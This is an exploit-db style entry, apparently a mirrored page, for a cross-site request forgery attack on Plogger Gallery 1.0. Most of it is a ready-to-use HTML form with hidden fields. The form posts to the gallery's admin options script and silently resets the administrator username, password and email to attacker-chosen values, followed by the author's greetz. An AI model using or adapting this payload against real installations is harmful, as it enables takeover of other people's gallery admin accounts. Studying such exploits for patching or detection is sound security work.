Plogger Gallery 1.0 – Cross-Site Request Forgery (Change Admin Password)

  • 作者: Or4nG.M4N
    日期: 2010-11-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15577/
  • -------------------------------------------------------------------------
# Software: PloggerGallery Version 1.0 
# Author: Or4nG.M4N 
# Date: n/a
# Dork: Forbidden 
# Software Link : http://www.plogger.org/download/ 
-------------------------------------------------------------------------
+---+[CSRF Change Admin Password by OR4NG.M4N]+---+
<html> 
<head> 
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head> 
<body>
<h1>CSRF Change Admin Password by OR4NG.M4N</h1>
<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="ro0t" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="priv8te@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="ro0t" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="ro0t" type="hidden"></td>
</tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="Change FuCKeD" type="submit"></td>

--------------------------------------------------------
# Email - priv8te@hotmail.com
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------